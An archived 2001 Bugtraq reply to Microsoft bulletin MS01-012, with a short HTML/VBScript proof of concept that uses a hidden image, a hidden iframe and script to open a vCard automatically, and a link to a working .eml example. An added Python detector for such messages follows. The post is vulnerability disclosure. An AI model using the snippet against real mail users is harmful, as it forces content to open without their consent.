[19374] in bugtraq
Re: Microsoft Security Bulletin MS01-012
daemon@ATHENA.MIT.EDU (http-equiv@excite.com)
Mon Feb 26 17:48:55 2001
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Message-ID: <22205652.983132054934.JavaMail.imail@almond.excite.com>
Date: Sun, 25 Feb 2001 12:14:10 -0800
Reply-To: http-equiv@excite.com
From: "http-equiv@excite.com" <http-equiv@excite.com>
To: BUGTRAQ@SECURITYFOCUS.COM
Dear Sir,
>Mitigating Factors:
>====================
> - There is no means by which a Vcard could be made to open
> automatically.
This is not entirely accurate. If you are in the habit of collecting these
odd things, you will have most certainly uncheck-marked the security warning
a long time ago. In that case it is less than trivial to open the Vcard
automatically:
<img id="Bill_Gates" SRC="cid:malware.com" style="VISIBILITY: hidden">
<IFRAME id=Compelling style="VISIBILITY: hidden">
</IFRAME>
<SCRIPT language=vbs>
document.all.item("Compelling").document.location=Bill_Gates.src
</SCRIPT>
Working example:
http://www.malware.com/crap.eml
Yours Sincerely,
Your friend and mine,
http://www.malware.com
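A defensive check for the message pattern described in this post, as an added example that is not part of the original message: it flags mail whose HTML body carries script and also references a vCard part through a cid: URL. The function name, the set of vCard MIME types and the sample message are assumptions constructed for illustration.

```python
import email
from email import policy
from html.parser import HTMLParser

VCARD_TYPES = {"text/x-vcard", "text/vcard", "text/directory"}  # assumed type set

class _Scan(HTMLParser):
    """Collects cid: references and notes whether the HTML carries script."""
    def __init__(self):
        super().__init__()
        self.cids, self.has_script = set(), False
    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.has_script = True
        for name, value in attrs:  # tag and attribute names arrive lowercased
            if name in ("src", "href") and value and value.lower().startswith("cid:"):
                self.cids.add(value[4:].strip("<>"))

def scripted_vcard_refs(raw):
    """Return Content-IDs of vCard parts that a scripted HTML body references."""
    msg = email.message_from_string(raw, policy=policy.default)
    vcards, scan = set(), _Scan()
    for part in msg.walk():
        ctype = part.get_content_type()
        name = (part.get_filename() or "").lower()
        if ctype in VCARD_TYPES or name.endswith(".vcf"):
            vcards.add(str(part.get("Content-ID") or "").strip().strip("<>"))
        elif ctype == "text/html":
            scan.feed(part.get_content())
    vcards.discard("")  # a vCard part without a Content-ID cannot be cid-referenced
    return sorted(scan.cids & vcards) if scan.has_script else []

# Constructed sample message, modelled on the markup quoted in the post.
SAMPLE = """\
Content-Type: multipart/related; boundary="b1"

--b1
Content-Type: text/html; charset=us-ascii

<img id="x" SRC="cid:card1" style="VISIBILITY: hidden"><IFRAME id=f></IFRAME>
<SCRIPT language=vbs>document.all.item("f").document.location=x.src</SCRIPT>
--b1
Content-Type: text/x-vcard; name="contact.vcf"
Content-ID: <card1>

BEGIN:VCARD
END:VCARD
--b1--
"""
```

A non-empty result is a reason to quarantine or strip the HTML part at the mail gateway, since a plain inline image reference to a vCard has no legitimate need for script.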